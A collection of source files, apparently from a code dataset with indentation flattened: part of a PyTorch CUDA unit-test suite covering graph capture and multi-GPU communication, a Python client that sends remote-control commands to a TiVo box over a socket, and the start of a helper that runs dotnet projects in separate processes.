stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
        # A dummy allocation triggers process_events, which should successfully process b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
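    # Illustrative sketch of the warmup -> capture -> replay flow used above with
    # torch.cuda.amp.GradScaler (loss_fn and opt are placeholders):
    #
    #     s = torch.cuda.Stream()
    #     s.wait_stream(torch.cuda.current_stream())
    #     with torch.cuda.stream(s):                 # warmup, not captured
    #         scaler.scale(loss_fn()).backward()
    #     torch.cuda.current_stream().wait_stream(s)
    #     opt.zero_grad(set_to_none=True)
    #     with torch.cuda.graph(g):                  # capture the scaled backward
    #         scaler.scale(loss_fn()).backward()
    #     g.replay()                                 # per iteration: replay the graphed part,
    #     scaler.step(opt)                           # then step/update stay eager
    #     scaler.update()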
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
            # Resets RNG states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
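    # Illustrative sketch of torch.cuda.make_graphed_callables as exercised above;
    # the module and sample-input names are placeholders:
    #
    #     section1_g, section2_g = torch.cuda.make_graphed_callables(
    #         (section1, section2), ((sample_x,), (sample_h,)))
    #     # The returned callables (forward and backward) are drop-in replacements
    #     # in the training loop, as long as input shapes match the samples.
    #     out = section2_g(section1_g(real_x))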
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
            running_mean=None, running_var=None, momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
            a: torch.Tensor
            b: torch.Tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
            a: torch.Tensor
            b: torch.Tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
connection.py
|
import logging
import socket
import select
import threading
import time
from . import const
from . import response
class TiVoError(Exception):
pass
class TiVoSocketError(Exception):
pass
class ThreadedSocket(object):
def __init__(self, host, port):
self._host = host
self._port = port
self._data = b""
self._timeoutLock = threading.Lock()
self._timeout = None
self._connect()
def send(self, data):
self._sock.sendall(data)
def wait(self, timeout = 0):
self._timeoutLock.acquire()
self._timeout = time.time() + timeout
self._timeoutLock.release()
self._recvThread.join()
return self._data
def _connect(self):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(10)
self._sock.connect((self._host, self._port))
self._sock.setblocking(0)
self._recvThread = threading.Thread(target = self._receive)
self._recvThread.start()
def _receive(self):
while True:
try:
self._timeoutLock.acquire()
timeout = self._timeout
self._timeoutLock.release()
if timeout and time.time() >= timeout:
raise TimeoutError()
ready = select.select([self._sock], [], [], 0.5)
if ready[0]:
data = self._sock.recv(4096)
self._data += data
            except Exception:
                # Any error (including the TimeoutError raised above once the
                # wait() deadline passes) ends the receive loop and closes the socket.
                self._sock.close()
                return False
class TiVoConnection(object):
def __init__(self, host, port):
self._host = host
self._port = port
self._sendCommandsLock = threading.Lock()
def sendCommands(self, commands):
try:
self._sendCommandsLock.acquire()
sock = ThreadedSocket(self._host, self._port)
if len(commands) > 0:
# Leave some time to receive the first message before sending anything
time.sleep(0.1)
for command in commands:
if command.startswith("WAIT "):
try:
timeToSleep = float(command[5:])
time.sleep(timeToSleep)
except ValueError:
pass
else:
fullCommand = command + "\r"
sock.send(fullCommand.encode("utf-8"))
time.sleep(0.1)
allData = sock.wait(1.0)
if len(allData) == 0:
return []
allData = allData.decode("utf-8")
allResponses = allData.split("\r")
allResponses = filter(None, allResponses)
parsedResponses = list(map(self._parseResponse, allResponses))
return parsedResponses
        except Exception as exc:
            raise TiVoSocketError() from exc
finally:
self._sendCommandsLock.release()
@staticmethod
def _readFromSocket(sock, timeout):
allData = b""
begin = time.time()
        while time.time() - begin < timeout:
ready = select.select([sock], [], [], timeout)
print("Ready {}".format(ready))
if ready[0]:
data = sock.recv(4096)
allData += data
else:
break
return allData
def fetchOnState(self):
responses = self.sendCommands([])
return len(responses) > 0
def setOnState(self, state):
on = self.fetchOnState()
if on == state:
return
commands = None
if state:
commands = ["IRCODE STANDBY"]
else:
commands = ["IRCODE STANDBY", const.SpecialCommand.WAIT(0.5), "IRCODE STANDBY"]
self.sendCommands(commands)
def fetchCurrentChannel(self):
responses = self.sendCommands([])
if len(responses) == 0:
return None
lastResponse = responses[0]
return response.FullChannelName(lastResponse)
def setChannel(self, channel):
responses = self.sendCommands(["SETCH " + channel])
if len(responses) == 0:
return False
lastResponse = responses[-1]
if not response.IsChannelStatus(lastResponse):
return False
return lastResponse["channel"] == channel.zfill(4)
def forceChannel(self, channel):
responses = self.sendCommands(["FORCECH " + channel])
if len(responses) == 0:
return False
lastResponse = responses[-1]
if not response.IsChannelStatus(lastResponse):
return False
return lastResponse["channel"] == channel.zfill(4)
def sendIRCode(self, code):
return self.sendCommands(["IRCODE " + code])
def sendKeyboard(self, code):
return self.sendCommands(["KEYBOARD " + code])
def sendTeleport(self, code):
return self.sendCommands(["TELEPORT " + code])
@staticmethod
def _parseResponse(message):
split = message.split(" ")
type = split[0]
response = {
"raw": message,
"type": type
}
if type == const.ResponseType.CH_STATUS:
response["channel"] = split[1]
response["reason"] = split[-1]
response["subChannel"] = split[2] if len(split) == 4 else None
elif type == const.ResponseType.CH_FAILED:
response["reason"] = split[1]
return response
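if __name__ == "__main__":
    # Minimal usage sketch, runnable as a module (python -m <package>.connection).
    # The address below is a placeholder; TiVo's network remote protocol
    # conventionally listens on TCP port 31339, but verify for your device.
    # The IRCODE names are examples only.
    conn = TiVoConnection("192.168.1.50", 31339)
    print("Powered on:", conn.fetchOnState())
    print("Current channel:", conn.fetchCurrentChannel())
    # sendCommands also understands a "WAIT <seconds>" pseudo-command:
    conn.sendCommands(["IRCODE TIVO", "WAIT 0.5", "IRCODE LIVETV"])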
|
services.py
|
"""
Execute dotnet projects in parallel separate processes
"""
import glob
import shlex
import subprocess
from multiprocessing import Process
from os import path
from typing import List
from .printing import print_green
def run(project: str, command_type: str, watch_mode: bool):
"""Execute dotnet command
Arguments:
project {str} -- project name
command_type {str} -- [run, test, restore, build, clean]
watch_mode {bool} -- watch code changes
"""
command: List[str] = []
if command_type in ['run']:
command = shlex.split(f'dotnet {command_type} -p {project}')
if watch_mode:
command = shlex.split(f'dotnet watch -p {project} {command_type}')
else:
command = shlex.split(f'dotnet {command_type} {project}')
process = subprocess.Popen(command)
process.communicate(input=None)
def start_service(
working_directory: str,
service_name: str,
command: str,
watch_mode: bool,
) -> None:
"""Start process container
    Arguments:
        working_directory {str} -- path to the projects
        service_name {str} -- service directory name (full/partial)
        command {str} -- [run, test, restore, build, clean]
        watch_mode {bool} -- watch code changes
"""
repo_path = path.join(working_directory, service_name)
all_pros = list(glob.iglob(f'{repo_path}/**/*.csproj', recursive=True))
test_projects = [
pro for pro in all_pros
